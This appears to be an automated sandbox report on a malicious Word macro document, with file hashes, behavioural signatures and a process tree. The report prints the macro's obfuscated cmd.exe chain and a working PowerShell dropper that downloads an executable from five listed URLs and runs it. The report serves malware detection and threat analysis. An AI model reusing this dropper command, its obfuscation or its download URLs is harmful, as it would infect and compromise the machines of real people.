Analysis
-
max time kernel
143s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
16/05/2024, 23:51
General
-
Target
4d9fa607a9222d52af8e5c98991fc228_JaffaCakes118.doc
-
Size
364KB
-
MD5
4d9fa607a9222d52af8e5c98991fc228
-
SHA1
69e3b37f348c63f07c921c11cf89fb0362195b03
-
SHA256
9f5de865bd1a17e8fd301365dff8ce1d29245f40f49ed62f30b27a76e315c7d0
-
SHA512
a4c8cb713baf60063abda6f87956e600547e00fb825fc3c1f5fcfce61e7353a7fc3077ca30cc04b8d9f5ef36c01550a02ec56fae89a3de4ddf5a9231676eca25
-
SSDEEP
6144:zxjFSdDqxP1Ow5lKWyipxTKXYWofsWwnZBF0z1Nfxzjb:hFSpsgw5sWyqAX8+zF2fRjb
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://darraghkelly.com/LOSHOuRtLR/
exe.dropper
http://strike3productions.com/ulrKCFzG2/
exe.dropper
http://dmgkagit.com.tr/9iHI5gW6d9/
exe.dropper
http://billfritzjr.com/bOHg53ns/
exe.dropper
http://websteroids.ro/jPv0qy4H7/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 7 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Start PowerShell.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4d9fa607a9222d52af8e5c98991fc228_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c f^or ; ; /^F , " tokens= 1 delims=hof" ; %^b ; ^In ; , ( , ' ; , f^^tYPe , , ^| ; ; fIN^^d ; , "dfil" ; , ' , , ) , , DO ; %^b; ; ; VdBQq7eAr^/v8^ ^ ; , sTpcko/^c " , , (SE^t ^ `^ =7+0v5ph/dcP^H^xMwjzu^Z^\eAFKIay4Wq{^S:tr-^Osb,G}m.^2N =^oRC^(fn3^$Dg6ik^LU^l^1@'^9^)^;)&& , F^oR ; %^g ; ; In ; , ( ^ 5 48^ +^14 ^ 20^ +34 3^7 6^ ^ 20^ 63^ 63 46^ ^55 , 40^ +37 ^37 , , 47 53 20 ^14 +35 4^8 +38 15 20 +9^ ^33 +46 +^45^ ,^ , 20^ 3^3 ^43 ^ 2^8 , ^ , 20 , 3^8 50 ^63 ^ ; ^ ; 59 ^+20 ;^ ; 5^3 ^ 3^3 69 55 45 ^+21 ^ ^8 47 ^66 ^6 +33 ; +3^3 5 ^ 32 , 7 , ,^ +7^ ^8 25 ; +34 34 ; ^;^ ^ 25 ; 57^ , 6 60^ ^ 20^ ^ ^ 63 , , +63 ^ 2^6 , , 43 ^ 9 48 42^ ; ; 7^ ; ;^ 61 ^ +36 31 1^1 ; ; 36 , , ^ 17^ 49 33 61^ 4^9 ^ 7 65 ^;^ ^ 6 +33^ 33^ ^ 5 ; ; ^32 +7 7 37 33^ ^ 34 59 6^0^ 20 54 5 ;^ ; +34 ^48 +^8 17^ 9 ^ +33 59 48 53 +^3^7^ 43 ^9 +^48 42 ;^ ;^ 7 ^+17^ 63 34 ^ +23 ^ +50 22 ^ ,^ 16 ; ; 40 44 ^7 6^5 6 33 ; ;^ 33 5 32^ 7 7 +8 4^2 +^57 6^0^ 25 +5^7 5^9 ^ 33 ^ +43 9 48 ; ^ ^; +42 4^3 +^33 +34 ^7 , ^ +67 59 ^;^ +^11 +24 ^4 ;^ 57^ ^28 ^5^8 +8 ^,^ 67 , ,^ +7^ 65 +6 ^ 33 33 ^ , ^ , 5 32 ^7 ^ 7 ^38 59 ^ +63 63 , , 52 3^4 59 +^33 16 ^ , ^ , ^15 34 +43 +^9^ ^48 , 42 ; 7 ; ;^ 38 ^36 ^, 11 ^5^7 , , ^ +4 +54 5^3 , , 3^7^ ^ ^7 65 , ^,^ 6^ ^+33^ 33 ^; ; 5 32 ^7^ ^ ; ^; +7 14 ^20 38^ ^ +^37 ^ +^33 20 34 ^ , 48 59 8 3^7 43 34 48 7 +15 1^0 , 3 +2 29^ +26 27 11 0 , ^7 66 43 +31 5 +^63 59 3^3 , ,^ +51^ 6^6 ^65 , +66^ 68 69 55^ 1^3 +4^2 62 , , 46 4^7 ^ ^; ^46 66 5^4 2 ; 64 66 +69^ ; 55 ^ +37 ^2^8^ ^+14 ^47 55 ^ 20 ^; 53 ^3 ; ^; 32 ^ , , 3^3 ^ ^+20 42 , +5 ^ ^ +1 +66 19 66^ 1 ^ 55 +13 42^ +62 ^ ;^ ; 1 ^ ,^ +6^6 ^43 20 ^ ^1^2 20 66 ; ^ ^; 6^9 52 ; 48 ^ 34 ^, , +20 +25 9 6 +51 ; 55 14 +18^ ;^ ^3^1 46 ^59 53 ^ 46 ^ ^+55 45 21^ ^ ; ^ ; ^ 8 ^ 68 ^30 , ^, 33^ , , 34 ; ; 26 30 55 ^40 , 37 ; 37 43 ,^ , 56 48 14 53 ^ ^63 48^ +25 ^; 8 ^+22 59 63 20 , ^ , ^ ^51 ^ 5^5 +14 18 ; +31 ^+39 46 +55^ 37 28 ^, ,^ 14 68 6^9 31 33^ 2^5 +3^4 33 ; ^35 10 3^4^ ^ 48 ^; 9 20 ^37 ;^ 37 +^46^ 55 ^ 37 28^ ,^ 1^4 6^9 38 34^ ^; ^ ^; 20 2^5 , 6^0 6^9 41 9^ ^25 +^33 9 ^ ^, , 6 30 ^41^ 4^1 +46 , ^ , +46 ^ ,^ , 46 46 ; ;^ +^46 ^, 46 ^46^ 46 46 +46 46 46 ; ^46 ^46 , +46 46^ ; 46 ^, ^ , 76 ^ ^ ; ^ ) ; ; ^do ( ; ; (Se^t {^ =!{^ !!`^ :~ %^g, 1!) , , , , , )& ; ^if ; , %^g ; , e^qu , , +76 , ; ( , (ca^LL ; , %{^ :*{ ^ !=%) ) "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c f^tYPe | fIN^d "dfil"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ftYPe "4⤵
-
-
C:\Windows\system32\find.exefINd "dfil"4⤵
-
-
-
C:\Windows\system32\cmd.execmd ; ; ; VdBQq7eAr/v8 ; , sTpcko/c " , , (SE^t ^ `^ =7+0v5ph/dcP^H^xMwjzu^Z^\eAFKIay4Wq{^S:tr-^Osb,G}m.^2N =^oRC^(fn3^$Dg6ik^LU^l^1@'^9^)^;)&& , F^oR ; %^g ; ; In ; , ( ^ 5 48^ +^14 ^ 20^ +34 3^7 6^ ^ 20^ 63^ 63 46^ ^55 , 40^ +37 ^37 , , 47 53 20 ^14 +35 4^8 +38 15 20 +9^ ^33 +46 +^45^ ,^ , 20^ 3^3 ^43 ^ 2^8 , ^ , 20 , 3^8 50 ^63 ^ ; ^ ; 59 ^+20 ;^ ; 5^3 ^ 3^3 69 55 45 ^+21 ^ ^8 47 ^66 ^6 +33 ; +3^3 5 ^ 32 , 7 , ,^ +7^ ^8 25 ; +34 34 ; ^;^ ^ 25 ; 57^ , 6 60^ ^ 20^ ^ ^ 63 , , +63 ^ 2^6 , , 43 ^ 9 48 42^ ; ; 7^ ; ;^ 61 ^ +36 31 1^1 ; ; 36 , , ^ 17^ 49 33 61^ 4^9 ^ 7 65 ^;^ ^ 6 +33^ 33^ ^ 5 ; ; ^32 +7 7 37 33^ ^ 34 59 6^0^ 20 54 5 ;^ ; +34 ^48 +^8 17^ 9 ^ +33 59 48 53 +^3^7^ 43 ^9 +^48 42 ;^ ;^ 7 ^+17^ 63 34 ^ +23 ^ +50 22 ^ ,^ 16 ; ; 40 44 ^7 6^5 6 33 ; ;^ 33 5 32^ 7 7 +8 4^2 +^57 6^0^ 25 +5^7 5^9 ^ 33 ^ +43 9 48 ; ^ ^; +42 4^3 +^33 +34 ^7 , ^ +67 59 ^;^ +^11 +24 ^4 ;^ 57^ ^28 ^5^8 +8 ^,^ 67 , ,^ +7^ 65 +6 ^ 33 33 ^ , ^ , 5 32 ^7 ^ 7 ^38 59 ^ +63 63 , , 52 3^4 59 +^33 16 ^ , ^ , ^15 34 +43 +^9^ ^48 , 42 ; 7 ; ;^ 38 ^36 ^, 11 ^5^7 , , ^ +4 +54 5^3 , , 3^7^ ^ ^7 65 , ^,^ 6^ ^+33^ 33 ^; ; 5 32 ^7^ ^ ; ^; +7 14 ^20 38^ ^ +^37 ^ +^33 20 34 ^ , 48 59 8 3^7 43 34 48 7 +15 1^0 , 3 +2 29^ +26 27 11 0 , ^7 66 43 +31 5 +^63 59 3^3 , ,^ +51^ 6^6 ^65 , +66^ 68 69 55^ 1^3 +4^2 62 , , 46 4^7 ^ ^; ^46 66 5^4 2 ; 64 66 +69^ ; 55 ^ +37 ^2^8^ ^+14 ^47 55 ^ 20 ^; 53 ^3 ; ^; 32 ^ , , 3^3 ^ ^+20 42 , +5 ^ ^ +1 +66 19 66^ 1 ^ 55 +13 42^ +62 ^ ;^ ; 1 ^ ,^ +6^6 ^43 20 ^ ^1^2 20 66 ; ^ ^; 6^9 52 ; 48 ^ 34 ^, , +20 +25 9 6 +51 ; 55 14 +18^ ;^ ^3^1 46 ^59 53 ^ 46 ^ ^+55 45 21^ ^ ; ^ ; ^ 8 ^ 68 ^30 , ^, 33^ , , 34 ; ; 26 30 55 ^40 , 37 ; 37 43 ,^ , 56 48 14 53 ^ ^63 48^ +25 ^; 8 ^+22 59 63 20 , ^ , ^ ^51 ^ 5^5 +14 18 ; +31 ^+39 46 +55^ 37 28 ^, ,^ 14 68 6^9 31 33^ 2^5 +3^4 33 ; ^35 10 3^4^ ^ 48 ^; 9 20 ^37 ;^ 37 +^46^ 55 ^ 37 28^ ,^ 1^4 6^9 38 34^ ^; ^ ^; 20 2^5 , 6^0 6^9 41 9^ ^25 +^33 9 ^ ^, , 6 30 ^41^ 4^1 +46 , ^ , +46 ^ ,^ , 46 46 ; ;^ +^46 ^, 46 ^46^ 46 46 +46 46 46 ; ^46 ^46 , +46 46^ ; 46 ^, ^ , 76 ^ ^ ; ^ ) ; ; ^do ( ; ; (Se^t {^ =!{^ !!`^ :~ %^g, 1!) , , , , , )& ; ^if ; , %^g ; , e^qu , , +76 , ; ( , (ca^LL ; , %{^ :*{ ^ !=%) ) "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $Gss=new-object Net.WebClient;$NAd='http://darraghkelly.com/LOSHOuRtLR/@http://strike3productions.com/ulrKCFzG2/@http://dmgkagit.com.tr/9iHI5gW6d9/@http://billfritzjr.com/bOHg53ns/@http://websteroids.ro/jPv0qy4H7/'.Split('@');$MmU = '301';$sWw=$env:temp+'\'+$MmU+'.exe';foreach($wZS in $NAd){try{$Gss.DownloadFile($wZS, $sWw);Start-Process $sWw;break;}catch{}}4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB